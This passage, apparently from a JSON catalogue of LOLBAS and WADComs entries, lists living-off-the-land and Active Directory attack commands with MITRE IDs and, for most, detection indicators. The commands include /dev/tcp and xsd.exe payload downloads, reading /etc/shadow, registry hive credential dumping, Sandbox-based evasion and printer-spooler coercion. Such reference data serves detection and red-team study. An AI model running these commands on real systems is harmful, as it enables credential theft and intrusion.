arbitrary commands in an EDR-free environment whose host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsb-exe:1","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start --config \"<Configuration><MappedFolders><MappedFolder><HostFolder>{PATH_ABSOLUTE:folder}</HostFolder><ReadOnly>false</ReadOnly></MappedFolder></MappedFolders></Configuration>\"\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy C:\\users\\WDAGUtilityAccount\\Desktop\\Temp\\{PATH} {PATH}\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted under `C:\\users\\WDAGUtilityAccount\\Desktop` with the same folder name as the source folder. This allows, for example, for copying payloads from the host system into the sandbox (seen here), copying payloads from the sandbox back to the host system, or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsb-exe:2","toolId":"lolbas:wsb-exe","toolName":"wsb.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsb start\nwsb share --id YOUR_ID -f {PATH_ABSOLUTE:folder} -s c:\\SOME_FOLDER --allow-write\nwsb exec -r System --id YOUR_ID -c \"cmd.exe /c copy {PATH_ABSOLUTE} c:\\SOME_FOLDER\"","description":"Allows the specified folder to be accessible from within the Windows Sandbox, mounted at `c:\\SOME_FOLDER`. This allows, for example, for copying payloads from the host system into the sandbox, copying payloads from the sandbox back to the host system (seen here), or for accessing arbitrary host system files by the sandbox.","usecase":"Fileless execution of arbitrary commands in an EDR-free environment, with access to files on the host system, while the host-side process tree is masked by the Sandbox client binaries.","mitre":["T1564.006"],"privilege":"user","fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"wsb.exe command line containing --config with an embedded <LogonCommand> XML element"},{"type":"IOC","value":"wsb.exe command line invoking the share subcommand with --allow-write"},{"type":"IOC","value":"wsb.exe command line invoking the exec subcommand with -r System"},{"type":"IOC","value":"WindowsSandboxServer.exe spawns whenever a Sandbox session starts, regardless of whether anyone connects. Lives under %ProgramFiles%\\WindowsApps\\MicrosoftWindows.WindowsSandbox_*\\."},{"type":"IOC","value":"WindowsSandboxRemoteSession.exe spawns ONLY when an RDP connection to the Sandbox is established - opening a .wsb file directly auto-connects (so both processes appear), but `wsb start` alone does NOT spawn it. Its absence while WindowsSandboxServer.exe is alive means no user has connected."},{"type":"IOC","value":"(highest-signal for headless abuse) WindowsSandboxServer.exe present WITHOUT WindowsSandboxRemoteSession.exe indicates a Sandbox VM is running with no interactive session. Legitimate usage almost always involves an RDP connection (because users want to use the Sandbox); a server-without-remote-session state is consistent with the `wsb exec -r System` headless attack primitive."},{"type":"IOC","value":"vmwp.exe and vmmemWindowsSandbox spawned alongside wsb.exe activity indicate the Sandbox VM is up (vmwp is the Hyper-V worker hosting the Sandbox VM)"},{"type":"IOC","value":"Host-side file-creation events on paths corresponding to a mapped folder, attributed to vmwp.exe (Hyper-V worker), with timestamps inside the lifetime of an active Sandbox session - empirically verified on Windows 11 24H2 via Process Monitor; this is how a sandbox-to-host cross-boundary write surfaces from host telemetry"},{"type":"IOC","value":"Microsoft-Windows-Sandbox-Client-Diagnostics/Admin event log entries for Sandbox lifecycle events correlated with wsb.exe invocations"}],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"]},{"id":"lolbas:wsl-exe:0","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -e /mnt/c/Windows/System32/calc.exe","description":"Executes calc.exe from wsl.exe","usecase":"Performs execution of specified file, can be used to execute arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:1","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe -u root -e cat /etc/shadow","description":"Cats /etc/shadow file as root","usecase":"Performs execution of arbitrary Linux commands as root without need for password.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:2","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe --exec bash -c \"{CMD}\"","description":"Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)","usecase":"Performs execution of arbitrary Linux commands.","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:3","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'","description":"Downloads file from 192.168.1.10","usecase":"Download file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:wsl-exe:4","toolId":"lolbas:wsl-exe","toolName":"Wsl.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"wsl.exe","description":"When executed, `wsl.exe` queries the registry value of `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation`, which contains a folder path (`c:\\program files\\wsl` by default). If the value points to another folder containing a file named `wsl.exe`, it will be executed instead of the legitimate `wsl.exe` in the program files folder.","usecase":"Execute a payload as a child process of `bash.exe` while masquerading as WSL.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\wsl.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wsl_lolbin_execution.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Child process from wsl.exe"}],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"]},{"id":"lolbas:xbootmgr-exe:0","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -callBack {PATH:.exe}","description":"Executes an executable after the trace is complete using the callBack parameter.","usecase":"Executes code as part of post-trace automation flow.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"]},{"id":"lolbas:xbootmgr-exe:1","toolId":"lolbas:xbootmgr-exe","toolName":"XBootMgr.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgr.exe -trace \"{boot|hibernate|standby|shutdown|rebootCycle}\" -preTraceCmd {PATH:.exe}","description":"Executes an executable before each trace run using the preTraceCmd parameter.","usecase":"Executes code as part of pre-trace automation or staging.","mitre":["T1202"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"]},{"id":"lolbas:xbootmgrsleep-exe:0","toolId":"lolbas:xbootmgrsleep-exe","toolName":"XBootMgrSleep.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"xbootmgrsleep.exe 1000 {PATH:.exe}","description":"Execute executable via XBootMgrSleep, with a 1 second (=1000 milliseconds) delay. Alternatively, it is also possible to replace the delay with any string for immediate execution.","usecase":"Performs execution of specified executable, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"toolType":"OtherMSBinary","references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"]},{"id":"lolbas:devtunnel-exe:0","toolId":"lolbas:devtunnel-exe","toolName":"devtunnel.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"devtunnel.exe host -p 8080","description":"Enabling a forwarded port for locally hosted service at port 8080 to be exposed on the internet.","usecase":"Download Files, Upload Files, Data Exfiltration","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/dns_query/dns_query_win_devtunnels_communication.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/network_connection/net_connection_win_domain_devtunnels.yml"},{"type":"IOC","value":"devtunnel.exe binary spawned"},{"type":"IOC","value":"*.devtunnels.ms"},{"type":"IOC","value":"*.*.devtunnels.ms"},{"type":"Analysis","value":"https://cydefops.com/vscode-data-exfiltration"}],"references":["https://code.visualstudio.com/docs/editor/port-forwarding","https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"]},{"id":"lolbas:dotnet-counters-exe:0","toolId":"lolbas:dotnet-counters-exe","toolName":"dotnet-counters.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-counters.exe collect --duration 1 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting performance counter data for 1 second.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-counters collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-counters","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"]},{"id":"lolbas:dotnet-trace-exe:0","toolId":"lolbas:dotnet-trace-exe","toolName":"dotnet-trace.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dotnet-trace.exe collect --duration 00:00:01 -- {PATH:.exe}","description":"Launches the specified executable as a child process while collecting runtime trace data for 1 second during execution.","usecase":"Execute a child process under the guise of a legitimate .NET diagnostic tool.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"Process creation with command line containing \"dotnet-trace collect\" and \"--\""}],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-trace","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"]},{"id":"lolbas:vsls-agent-exe:0","toolId":"lolbas:vsls-agent-exe","toolName":"vsls-agent.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"vsls-agent.exe --agentExtensionPath {PATH_ABSOLUTE:.dll}","description":"Load a library payload using the --agentExtensionPath parameter (32-bit)","usecase":"Execute proxied payload with Microsoft signed binary","mitre":["T1218"],"privilege":"user","fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"toolType":"OtherMSBinary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_vslsagent_agentextensionpath_load.yml"}],"references":["https://twitter.com/bohops/status/1583916360404729857","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"]},{"id":"lolbas:vstest-console-exe:0","toolId":"lolbas:vstest-console-exe","toolName":"vstest.console.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"vstest.console.exe {PATH:.dll}","description":"VSTest functionality may allow an adversary to executes their malware by wrapping it as a test method then build it to a .exe or .dll file to be later run by vstest.console.exe. This may both allow AWL bypass or defense bypass in general","usecase":"Proxy Execution and AWL bypass, Adversaries may run malicious code embedded inside the test methods of crafted dll/exe","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"vstest.console.exe spawning unexpected processes"}],"references":["https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"]},{"id":"lolbas:winfile-exe:0","toolId":"lolbas:winfile-exe","toolName":"winfile.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"winfile.exe {PATH:.exe}","description":"Execute an executable file with WinFile as a parent process.","usecase":"Performs execution of specified file, can be used as a defense evasion","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"toolType":"OtherMSBinary","references":["https://github.com/microsoft/winfile","https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"]},{"id":"lolbas:xsd-exe:0","toolId":"lolbas:xsd-exe","toolName":"xsd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"xsd.exe {REMOTEURL}","description":"Downloads payload from remote server","usecase":"It will download a remote payload and place it in INetCache","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"toolType":"OtherMSBinary","detection":[{"type":"IOC","value":"URL on a xsd.exe command line"},{"type":"IOC","value":"xsd.exe making unexpected network connections or DNS requests"}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"]},{"id":"wadcoms:ADCSEnumaration","toolId":"wadcoms:ADCSEnumaration","toolName":"ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"#Note that we are just enumarating here. We are not preforming exploitation. There is a linux equalivent called certipy that works much the same way\n# Find CAs \nC:Tools\\Certify.exe cas \n\n# Find templates\nC:Tools\\Certify.exe find \n\n# Find vulnerable templates\nC:Tools\\Certify.exe find /vulnerable","description":"Active Directory Certifcate Services or ADCS provide an alternative way to authenticate within a AD enviroment that contains a PKI as well as \nbeing configured with a Certifcate Authority. References below will provide technical info on ADCS as well as exploitation techniques from \nspectorops certfied preowned white paper.\n","mitre":[],"requires":["Shell"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion-Creds","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -u john -p password123 -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain: test.local\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:BloodHound.py-Remote-Ingestion","toolId":"wadcoms:BloodHound.py","toolName":"BloodHound.py","name":"BloodHound.py-Remote-Ingestion","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"bloodhound.py -d test.local -v --zip -c All -dc test.local -ns 10.10.10.1","description":"BloodHound is a single page Javascript web application, built on top of Linkurious, compiled with Electron, with a Neo4j database fed by a data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment.\n\nBloodHound.py is a Python based ingestor for BloodHound, based on Impacket. It allows you to remotely collect data for bloodhound by querying LDAP\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"]},{"id":"wadcoms:CredDumpWithoutMimilkatz","toolId":"wadcoms:CredDumpWithoutMimilkatz","toolName":"CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"capability":[],"nativeCategory":[],"command":"# The following command will dump the SAM, SYSTEM, and SECURITY hives to the current directory.\nreg save HKLM\\SAM sam.hive\nreg save HKLM\\SYSTEM system.hive\nreg save HKLM\\SECURITY security.hive\n\n#Assuming you have transfered the hives to your kali\nsamdump2 system sam \n\n#We can also get lsa secrets via mimikatz\nlsadump::secrets /system:c:\\temp\\system.hive /security:c:\\temp\\security.hive","description":"The lsass Process while great, is no where neaar the only way to dump credintials from windows. One of which is access the three registry hives:\nSAM, SYSTEM, and SECURITY. This is a method that can be used to dump credentials without mimikatz as well as offer some potenial stealth. \n","mitre":[],"requires":["Shell","PrivEsc","Exploitation"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"]},{"id":"wadcoms:Dementor","toolId":"wadcoms:Dementor","toolName":"Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dementor.py -u john -p password123 -d test.local 10.10.10.2 10.10.10.1","description":"dementor.py interacts with the printer spooler on a host to trigger an authentication from the target IP to an attacker controlled host (usually an SMB or HTTP server). This captured authentication can then be relayed to authenticated to other hosts. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"]},{"id":"wadcoms:Enum4Linux-Creds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-Creds","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux -u john -p password123 -a 10.10.10.1","description":"Enum4Linux is a tool for enumerating information from Windows and Samba systems, using a number of different techniques. The following command will attempt to enumerate information provided valid login credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"references":["https://github.com/CiscoCXSecurity/enum4linux"]},{"id":"wadcoms:Enum4Linux-NoCreds","toolId":"wadcoms:Enum4Linux","toolName":"Enum4Linux","name":"Enum4Linux-NoCreds","source":"WADComs","platform":["Linux"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"enum4linux -a 10.10.10.1","description":"Enum4Linux is 